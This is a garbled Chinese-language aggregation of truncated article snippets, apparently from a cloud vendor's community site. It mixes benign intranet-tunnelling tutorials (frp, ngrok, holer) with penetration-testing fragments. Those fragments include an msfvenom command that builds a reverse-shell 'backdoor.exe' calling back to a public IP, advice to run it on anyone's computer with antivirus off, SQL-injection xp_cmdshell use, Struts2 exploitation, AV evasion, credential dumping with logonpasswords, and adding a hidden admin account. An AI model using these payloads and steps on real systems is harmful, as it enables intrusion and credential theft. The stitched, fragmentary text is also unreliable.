渗透的大体过程 整个渗透测试的流程就是通过信息收,集到外网的 web 漏洞挖掘,来获取一个 webshell ,通过这个 shell 进一步利用来打进内网,进行内网渗透、域渗透,最终获取域控权限的一个过程...从 webshell 到内网 从 sql 注入到内网渗透 直接举例。 拿到一个 mssql 注入,并且可以开启 xp_cmdshell 设置执行任意命令的情况下(--os-shell)。...从 S2-045 到内网渗透 检测 S2 的方法就不说了,直接工具一把梭。这里推荐使用 "Struts2漏洞检查工具2018版" 这个工具,可以批量导入 url ,效率还是可以的。...blog.51cto.com/0x007/1204440 在实战环境下遇到的几乎都是 jsp 的站点,php 的站非常少,所以需要平时多积累多练习一下对 jsp 站点的渗透 从文件上传 getshell 到内网...所以这时候你一般就没有办法直接连接到他的 3389 端口,因为他在内网里所以就只能使用端口转发了。 如果存在外网 IP 的话显示的就是外网 IP。
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。...工具: 我们到官网上下载就好了: https://github.com/fatedier/frp/releases 我这里下载的是最新版,当然我们还需要准备一台服务器,腾讯云什么就好 轻量级就可以了,...(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp...LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe -o选择文件名,ip地址选择外网服务器的地址 端口选择8000 下载到桌面 我这里用xshell...windows/meterpreter/reverse_tcp 设置IP和端口 然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭 运行后成功外网上线
外网访问内网Tomcat 本地安装了Tomcat,只能在局域网内访问,怎样从外网也能访问本地Tomcat? 本文将介绍具体的实现步骤。 1....startup.bat或者打开CMD控制台,进入目录下执行命令:startup.bat Linux系统平台: 执行命令: sh startup.sh 2.4 访问映射后的公网地址 浏览器里输入如下URL,就可从外网也能访问本地
外网访问内网Web 本地安装了Web服务端,只能在局域网内访问,怎样从外网也能访问本地Web? 本文将介绍具体的实现步骤。 1..../holer-xxx-xxx -k 6688daebe02846t88s166733595eee5d 2.4 访问映射后的公网地址 浏览器里输入如下URL,就可从外网也能访问本地Web了。
新建一个域名 ? ? 输入域名 ? 自动生成 ? ? 添加一个子域名 ? 输入子域名的名称(www | dnt | xxx) ? 新建一个主机(dns把域名解析到哪而去~) ? ?...输入设置的域名==》收工~ ? 有人会问了,那外网的呢? 如果你有独立的DNS服务器,那么可以在注册域名的地方设置一下自己的DNS服务器 ?...一般来说,我们都是绑定服务器,用域名提供商提供的DNS ?
外网访问内网SpringBoot 本地安装了SpringBoot,只能在局域网内访问,怎样从外网也能访问本地SpringBoot? 本文将介绍具体的实现步骤。 1....startup.bat或者打开CMD控制台,进入目录下执行命令:startup.bat Linux系统平台: 执行命令: sh startup.sh 2.4 访问映射后的公网地址 浏览器里输入如下URL,就可从外网也能访问本地
内网映射外网工具——ngrok 通过这个我们可以把本机的localhost:端口号映射成为一个外网地址 例如:我们平时启动服务器(如tomcat),然后localhost:8080/项目地址这种方式去本地访问...,项目无法运行在本机之外的电脑上,但我们通过这个外网映射工具后就可以把网址发给别来进行远程访问 废话不多说直接上步骤: 1、首先下载ngrok,去百度搜索下载就好了,解压 (https://ngrok.com.../download) 2、然后cmd到解压目录下(你的目录在哪你就进哪 cd C:\Users\yuqing.wu\Desktop\ngrok 3、根据你想要映射的端口号,一般如映射tomcat的8080
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受...
,可以绑定自己的域名 3....运行客户端命令 最简单的使用,切记需要修改配置文件里面的auth_token,并且subdomain域名前缀需要在平台绑定 Linux:....sunny Windows:ngrok.exe -config ngrok.cfg start sunny 意为将ngrok.cfg里配置的sunny服务启动,Windows在命令提示符窗口先进入到客户端软件目录执行...参数解读:-config是选择配置文件 -subdomain是自定义域名前缀 4....更多使用技巧,可以到ngrok官方去阅读文档。
外网访问内网Docker容器 局域网里的主机上安装了Docker容器,只能在内网访问,怎样从外网也能访问内网的Docker容器? 本文将介绍具体的实现步骤。 1....8866daebe02846t88s166733595fff5d & 2.4 访问映射后的公网地址 在ssh客户端上输入 主机名:holer.org 端口号: 65014 或者执行命令:ssh root@holer.org -p 65014 这样就可以从外网...ssh登录到内网的Docker容器了。
本地安装了一个Linux系统,只能在局域网内访问到,怎样从外网也能访问到本地的Linux系统呢?本文将介绍具体的实现步骤。 1....holer-xxx-xxx -k 8866daebe02846t88s166733595fff5d & 2.4 访问映射后的公网地址 在ssh客户端工具上输入主机名:holer.org,端口号: 65014就可以从外网访问本地的
出现了一个问题:在外网利用域名+端口号可以正常访问到公司的服务,在公司内网的时候访问却没办法利用域名访问,只能用IP才能访问到相关服务 找了一些资料,总结原因如下: 例:在公司内网访问: 访问者:...代号A 被访问者:代号B 路由器:代号R 由于在做DDNS时,在路由器上会把B绑定为公网IP,所以在访问者A访问域名时,解析出来的公网IP,这时候发送的包: 源地址为:A的内网IP,目的地址为:...SYN为1 在路由器上路由表对应的设备为访问者B,所以路由器会把包丢到被访问者B上,B收到包后会回应一个包: 源地址为:B的内网IP,目的地址为:A的内网IP。...SYN=1,ACK=1 这时候,A就收到了一个源地址为:B的内网IP,目的地址为:A的内网IP的包,在A的请求记录中没有发送给B的内网IP的包,所以A认为这是一个错误的包,于是A就把包丢弃,继续等待公网...IP回应的包,直到等待超时, 在B上,也一直等待A回应的TCP包,直到等待超时 如下图: 由于TCP三次握手没有完成,所以内网通过域名访问不到内网资源,造成了NAT回流 (NAT回环) 解决方法如下所示
- 弱鸡 (ruoji.info) 第一个flag–外网打点 第一个flag就是签到题,当时图忘记留了,就是直接就给出flag了 图片 图片 Z-BlogPHP 1.7.2CMS,后台路径是zb_system...port=7001 protocol=http username=admin123 password=c8aZaU CS简单做个免杀套个壳改一下特征码即可实现绕火绒,上传上去之后cs上线 这地方到后面几天...,免杀也不行了,虽说上传上去了但是运行不上线,用powershell进行上线 上传fscan进行内网探测 fscan.exe -h 192.168.1.0/24 -o res.txt fscan.exe...#外网对应内网地址 [+] SSH:192.168.1.129:22:root root #蜜罐 192.168.243.135:3306 open 192.168.243.135:135 open...129几乎全是蜜罐 第三个flag-内网横向 cs上线 图片 抓取密码 -logonpasswords Authentication Id : 0 ; 506030 (00000000:0007b8ae
看着这个标题我我自己都有点懵,大概意思就是用自己家的电脑架设一个传奇服务端,然后用FRP内网穿透可以在外网玩,标题写的有点纠结,就这样吧。...请先准备工具: 1.电脑(能上网的那种); 2.服务器1台(自己玩1M宽带即可,很多人玩就自己看着办); 3.一个支持frp内网穿透的路由器(好像有软件也可以支持,没试过); 4.好像没了(一个脑子༼...∗ •̀ (oo) •́ ∗ ༽) 开始搞事情 先在服务器上面安装frp内网穿透:Frp内网穿透Frp一键安装脚本及设置教程 然后就在路由器设置和服务器没啥太大的关系了。...爱游这里配置了所有端口,就是测试的时候配置的,事实证明并不需要,只需要7000,7100,7200端口 还有就是要在基本设置里面设置成外网的IP地址,不然是不开门的。 ?...下面是在外网访问的效果:(图片大让它加载一会会儿) ?
外网访问内网MySQL数据库 本地安装了MySQL数据库,只能在局域网内访问,怎样从外网也能访问本地MySQL数据库? 本文将介绍具体的实现步骤。 1....holer-xxx-xxx -k 8866daebe02846t88s166733595fff5d 2.4 访问映射后的公网地址 在数据库客户端上输入 主机名:holer.org 端口号: 65014 这样就可以从外网访问本地的
域名已经解析到了服务器外网IP了 连接到 www.txzkrj.icu 时发生错误。...域名已经解析到了服务器外网IP了 连接到 www.txzkrj.icu 时发生错误。...域名已经解析到了服务器外网IP了
从外网代码审计到三层内网各种漏洞拿到域控 代码审计拿到Webshell 首先是一个站:cocat.cc ?...内网渗透 通过查看当前机器进程发现有火绒 AV : ? 随即做免杀上线到 CS: ? 通过 nbtscan 发现内网还有一台主机存活: ?...内网横向移动-对域内主机进行渗透 通过对内网进行存活探测发现内网存活了三台:10.10.10.201、10.10.10.202(本机)、10.10.10.209 for /l %i in (1,1,255...目标运行 9090.exe 上线到 MSF: ?...opened (0.0.0.0:0 -> xxx.xxx.xxx.xxx:22222) at 2021-06-02 06:35:22 +0000 meterpreter > 通过令牌窃取常规手段把身份切换为域管
https://cloud.tencent.com/document/product/213/2758这篇文档里的2个.bat:wusin.bat和wusout.bat 分别用来切换内外网update源文档以...2012R2为例来介绍方法没问题,但方法在高版本系统上需要注意下:.bat里的/detectnow已经不适用部分高版本系统,切换完以后,可能需要人为触发下更新扫描比如win10系统、server2016
在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透...本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。...Passwordlist根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。...图7获取当前用户权限为系统权限 (5)添加管理员用户到管理组 在DOS命令中分别执行以下语句 net user siweb$ siweb /add net localgroup administrators...XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。
应该也不可用了 六、http://ngrok.ciqiuwl.cn/ 这个可以用,可以成功映射,默认80端口,可以自己修改端口号 1,下载windows版本的客户端,解压到你喜欢的目录 2,在命令行下进入到ngrok...客户端目录下 3,执行 ngrok -config=ngrok.cfg -subdomain xxx 80 //(xxx 是你自定义的域名前缀) 4,如果开启成功 你就可以使用 xxx.ngrok.xiaomiqiu.cn
领取专属 10元无门槛券
手把手带您无忧上云